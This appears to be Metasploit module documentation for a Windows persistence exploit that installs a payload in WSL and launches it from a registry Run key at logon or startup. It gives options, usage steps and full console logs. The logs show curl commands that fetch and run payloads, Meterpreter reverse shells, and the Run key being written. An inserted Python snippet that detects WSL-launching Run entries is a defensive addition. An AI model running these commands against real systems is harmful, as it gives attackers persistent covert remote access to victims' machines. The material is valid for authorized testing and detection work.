## Vulnerable Application

This module installs a payload in WSL and executes it at user logon or system startup via a registry value under `CurrentVersion\Run` or `RunOnce` (depending on privilege and the selected method). The payload is installed entirely in the registry.

Staged payloads, such as the Linux x64 fetch payloads, tend not to work: the payload requests the stage and the HTTP fetch request is issued, but once the stage is delivered it does not execute.

`cmd/linux/http/x64/meterpreter_reverse_tcp` and Unix `cmd` payloads tend to work.
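Because the Run value written by this module hands execution off to a WSL distribution, the defensive signal is an autorun entry whose command launches `wsl.exe` (or the legacy `bash.exe` launcher) or a binary on the WSL filesystem share. The following is an added example, not code from the module or its documentation: it parses constructed `reg query` output for the Run key and flags such entries; the exact command line the module installs is an assumption, not taken from this page.

```python
import re
from dataclasses import dataclass

# Constructed sample of `reg query HKCU\...\Run` output (not captured from a real host).
# The 91xgjErF entry mimics the shape a WSL-backed Run value would take; the exact
# command line the module writes is an assumption, not taken from the module doc.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\windows\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    91xgjErF    REG_SZ    C:\Windows\System32\wsl.exe -d Ubuntu -e sh -c "/tmp/DOgQVT"
    Updater     REG_EXPAND_SZ    %LOCALAPPDATA%\Updater\update.exe
"""

# One `reg query` value line: <indent><name><spaces><REG_type><spaces><data>
ENTRY_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)\s{2,}(?P<data>.*)$")

# Command-line fragments that indicate the autorun entry executes inside WSL.
WSL_INDICATORS = (
    r"\bwsl(\.exe)?\b",            # modern launcher: wsl.exe -d <distro> -e <cmd>
    r"\bbash(\.exe)?\b",           # legacy WSL launcher on older Windows 10 builds
    r"\\\\wsl(\$|\.localhost)\\",  # binary executed straight from the WSL file share
)


@dataclass
class RunEntry:
    name: str
    reg_type: str
    data: str
    wsl_launch: bool


def parse_run_key(text: str) -> list[RunEntry]:
    """Parse `reg query` output into entries, marking those that launch via WSL."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # key path header, blank line, or other non-value line
        data = m.group("data")
        flagged = any(re.search(p, data, re.IGNORECASE) for p in WSL_INDICATORS)
        entries.append(RunEntry(m.group("name"), m.group("type"), data, flagged))
    return entries


def wsl_run_entries(text: str) -> list[RunEntry]:
    """Return only the autorun entries that hand execution off to WSL."""
    return [e for e in parse_run_key(text) if e.wsl_launch]


if __name__ == "__main__":
    for e in wsl_run_entries(SAMPLE_REG_QUERY):
        print(f"[!] {e.name} ({e.reg_type}): {e.data}")
```

Run the same parser over `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and the two `RunOnce` keys to cover the `SYSTEM` startup type and the `RunOnce` option.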
## Verification Steps

1. Start `msfconsole`
2. Get a shell on Windows
3. Do: `use exploit/windows/persistence/wsl/registry`
4. Do: `set session #`
5. Do: `run`
6. You should get a shell on user or system login.
## Options

### STARTUP

Startup type for the persistent payload. Options are `USER` and `SYSTEM`; defaults to `USER`.

### RUN_NAME

The name to use for the Run key. Default: random.

### REG_KEY

Registry key to install to. Options are `Run` and `RunOnce`; defaults to `Run`.

### PAYLOAD_NAME

The filename for the payload to be used on the target host (random by default).
## Scenarios

### Windows 10 1909 (10.0 Build 18363), user access

#### Obtain original shell

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49747) at 2025-11-16 07:11:24 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```
#### Persistence

```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wsl/registry
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/wsl/registry) > set session 1
session => 1
msf exploit(windows/persistence/wsl/registry) > set payload
Display all 403 possibilities? (y or n)
msf exploit(windows/persistence/wsl/registry) > set payload cmd/linux/http/x64/meterpreter_reverse_tcp
payload => cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(windows/persistence/wsl/registry) > exploit
[*] Command to run on remote host: curl -so ./OOrIkKMB http://1.1.1.1:8080/rnjdQxeDeP7M_rcLHU37ew;chmod +x ./OOrIkKMB;./OOrIkKMB&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/wsl/registry) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /rnjdQxeDeP7M_rcLHU37ew
[*] Started reverse TCP handler on 1.1.1.1:4444
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rdtGlT3MB3n0dVy
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
-  -------------  -----  -------  -------
1  Ubuntu         Stopped  1      true
[*] Writing payload to: /tmp/DOgQVT
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\91xgjErF
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251116.2715/WIN10PROLICENSE_20251116.2715.rc
```
#### Reboot the system

```
[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
[*] Client 2.2.2.2 requested /rnjdQxeDeP7M_rcLHU37ew
[*] Sending payload to 2.2.2.2 (curl/8.5.0)
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49712) at 2025-11-16 07:29:39 -0500
[-] Meterpreter session 2 is not valid and will be closed
[*] 2.2.2.2 - Meterpreter session 2 closed.
msf exploit(windows/persistence/wsl/registry) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: windows
meterpreter > sysinfo
Computer     : win10prolicensed.localdomain
OS           : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 3...
msf exploit(windows/persistence/wsl/registry) > [*] 2.2.2.2 - Meterpreter session 3 closed.  Reason: Died
[*] Client 2.2.2.2 requested /rnjdQxeDeP7M_rcLHU37ew
[*] Sending payload to 2.2.2.2 (curl/8.5.0)
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:49726) at 2025-11-16 07:36:17 -0500
```